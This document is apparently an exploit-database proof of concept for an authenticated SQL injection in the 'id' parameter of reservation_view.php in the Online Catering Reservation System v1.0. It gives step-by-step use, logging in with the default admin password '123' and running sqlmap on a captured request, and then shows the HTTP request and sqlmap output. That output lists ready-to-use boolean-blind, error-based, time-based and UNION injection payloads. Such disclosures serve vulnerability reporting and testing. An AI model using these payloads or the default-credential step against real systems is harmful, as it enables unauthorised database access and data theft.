# Exploit Title: Online Catering Reservation System - SQL Injection (Authenticated) # Date: 2021-02-25 # Exploit Author: sml@lacashita.com # Vendor Homepage: https://www.sourcecodester.com/php/11355/online-catering-reservation.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip # Version: v1.0 # Tested on: Ubuntu 20.04.2 Parameter id in reservation_view.php is vulnerable to SQL Injection. POC --- 1) Visit http://VICTIM/admin/ 2) Put the default pass: 123 3) Go to Reservation->Confirmed Reservation -> View reservation or visit http://VICTIM/admin/reservation_view.php?id=1. 4) Save the request using Burp Suite as yourfile.txt 5) sqlmap -r yourfile.txt REQUEST ------- GET /admin/reservation_view.php?id=1 HTTP/1.1 Host: 192.168.1.117 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: sid=8spj19f306lim9ve5hg9iq56sf; lang=CZ; PHPSESSID=mdmn8a55hibuh8pav5serqhum1 Upgrade-Insecure-Requests: 1 SQLMAP OUTPUT ------------- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload: id=1' OR NOT 3039=3039# Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' OR (SELECT 9283 FROM(SELECT COUNT(*),CONCAT(0x716b6b7171,(SELECT (ELT(9283=9283,1))),0x717a6a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- xbWN Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=1' OR SLEEP(5)-- hENp Type: UNION query Title: MySQL UNION query (NULL) - 24 columns Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b7171,0x535a755264454a726a6350517146596d615a77595a71666a63524372725a4a506a7973684a567251,0x717a6a7071)#